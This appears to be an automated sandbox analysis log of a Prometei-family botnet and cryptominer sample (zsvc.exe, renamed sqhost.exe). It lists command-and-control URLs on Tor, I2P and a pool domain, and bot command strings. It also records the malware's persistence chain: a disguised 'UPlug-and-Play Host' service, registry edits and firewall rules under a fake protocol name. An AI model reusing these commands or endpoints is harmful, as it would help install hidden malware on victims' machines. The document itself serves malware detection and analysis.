Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp | String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi |
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp | String found in binary or memory: IpAddress<>C:\Windows\temp\brute_inhibitor.dat&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block remoteip=/C netsh advfirewall firewall delete rule name="Banned brute IPs"&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block localip=SeDebugPrivilegeNONE_MAPPED\%d %sNT AUTHORITY\SYSTEM %s\*...%s\%s{"i":"execver?r=&i=&ver=touchtop&answ=sysinfo?add=&h=&enckey=call-watchdog/C netsh advfirewall firewall delete rule name="Banned brute IPs"/C Auditpol /set /subcategory:"Logon" /failure:enableSecurityEvent/System[EventID=4625]CommTimeoutCommModehttp://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiUseVendorUrl0SOFTWARE\Intel\SupporthttpUseVendorUrl1Autoexec1Autoexec2taskkill_pathsearchNOT FOUNDchkport:extip&extip=enc01updatewbset_timeoutset_cc0set_cc1set_autoexec1set_autoexec2touch_internaltouch_stopwgetxwgetstop_miningstart_miningstart_mining1quitquit2OK - valid code |
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp | String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi |
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp | String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgipi.dllD |
Source: sqhost.exe, 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp | String found in binary or memory: IpAddress<>C:\Windows\temp\brute_inhibitor.dat&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block remoteip=/C netsh advfirewall firewall delete rule name="Banned brute IPs"&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block localip=SeDebugPrivilegeNONE_MAPPED\%d %sNT AUTHORITY\SYSTEM %s\*...%s\%s{"i":"execver?r=&i=&ver=touchtop&answ=sysinfo?add=&h=&enckey=call-watchdog/C netsh advfirewall firewall delete rule name="Banned brute IPs"/C Auditpol /set /subcategory:"Logon" /failure:enableSecurityEvent/System[EventID=4625]CommTimeoutCommModehttp://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiUseVendorUrl0SOFTWARE\Intel\SupporthttpUseVendorUrl1Autoexec1Autoexec2taskkill_pathsearchNOT FOUNDchkport:extip&extip=enc01updatewbset_timeoutset_cc0set_cc1set_autoexec1set_autoexec2touch_internaltouch_stopwgetxwgetstop_miningstart_miningstart_mining1quitquit2OK - valid code |
Source: sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp | String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi |
Source: sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp | String found in binary or memory: IpAddress<>C:\Windows\temp\brute_inhibitor.dat&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block remoteip=/C netsh advfirewall firewall delete rule name="Banned brute IPs"&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block localip=SeDebugPrivilegeNONE_MAPPED\%d %sNT AUTHORITY\SYSTEM %s\*...%s\%s{"i":"execver?r=&i=&ver=touchtop&answ=sysinfo?add=&h=&enckey=call-watchdog/C netsh advfirewall firewall delete rule name="Banned brute IPs"/C Auditpol /set /subcategory:"Logon" /failure:enableSecurityEvent/System[EventID=4625]CommTimeoutCommModehttp://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiUseVendorUrl0SOFTWARE\Intel\SupporthttpUseVendorUrl1Autoexec1Autoexec2taskkill_pathsearchNOT FOUNDchkport:extip&extip=enc01updatewbset_timeoutset_cc0set_cc1set_autoexec1set_autoexec2touch_internaltouch_stopwgetxwgetstop_miningstart_miningstart_mining1quitquit2OK - valid code |
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp | String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi |
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp | String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiW |
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp | String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi |
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp | String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgifier |
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp | String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi |
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp | String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJb |
Source: sqhost.exe, 0000001B.00000002.468366246.000000000056B000.00000004.00000020.sdmp | String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271 |
Source: sqhost.exe, 0000001B.00000002.468366246.000000000056B000.00000004.00000020.sdmp | String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q52710003 |
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp | String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgiexe |
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp | String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpj |
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp | String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi |
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp | String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgipi.dllD |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6456:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3704:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6824:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6432:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_01 |
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p | |
Source: unknown | Process created: C:\Users\user\Desktop\zsvc.exe 'C:\Users\user\Desktop\zsvc.exe' | |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc query UPlugPlay | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc query UPlugPlay | |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc' | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= auto | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc delete UPlugPlay | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc' | |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc config UPlugPlay start= auto | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start UPlugPlay | |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay | |
Source: unknown | Process created: C:\Windows\sqhost.exe c:\windows\sqhost.exe Dcomsvc | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\sqhost.exe c:\windows\sqhost.exe -watchdog | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start UPlugPlay | |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs' | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enable | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall delete rule name='Banned brute IPs' | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\auditpol.exe Auditpol /set /subcategory:'Logon' /failure:enable | |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product | |
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product | |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc query UPlugPlay | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc' | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= auto | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc query UPlugPlay | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc delete UPlugPlay | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc' | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc config UPlugPlay start= auto | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start UPlugPlay | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start UPlugPlay | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\sqhost.exe c:\windows\sqhost.exe -watchdog | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs' | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enable | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get product | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall delete rule name='Banned brute IPs' | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\auditpol.exe Auditpol /set /subcategory:'Logon' /failure:enable | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\sqhost.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\sqhost.exe | Last function: Thread delayed |
Source: C:\Windows\sqhost.exe | Last function: Thread delayed |
Source: C:\Windows\sqhost.exe | Last function: Thread delayed |
Source: C:\Windows\sqhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. |
Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service. |
Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported. |
Source: svchost.exe, 00000000.00000002.212282542.000001F0C3D40000.00000002.00000001.sdmp, sc.exe, 00000006.00000002.205549430.000001D09C630000.00000002.00000001.sdmp, sc.exe, 0000000F.00000002.210239450.00000220C08D0000.00000002.00000001.sdmp, reg.exe, 00000012.00000002.211563708.0000020EFC630000.00000002.00000001.sdmp, sc.exe, 00000014.00000002.211943954.0000021D7BC10000.00000002.00000001.sdmp, sc.exe, 0000001E.00000002.216955998.00000239EBB20000.00000002.00000001.sdmp, WMIC.exe, 00000025.00000002.240526052.000002BEE2060000.00000002.00000001.sdmp, WMIC.exe, 00000027.00000002.244835538.00000191189C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service. |
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc query UPlugPlay | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc' | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= auto | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay | Jump to behavior |
Source: C:\Users\user\Desktop\zsvc.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc query UPlugPlay | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc delete UPlugPlay | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore | Jump to behavior |
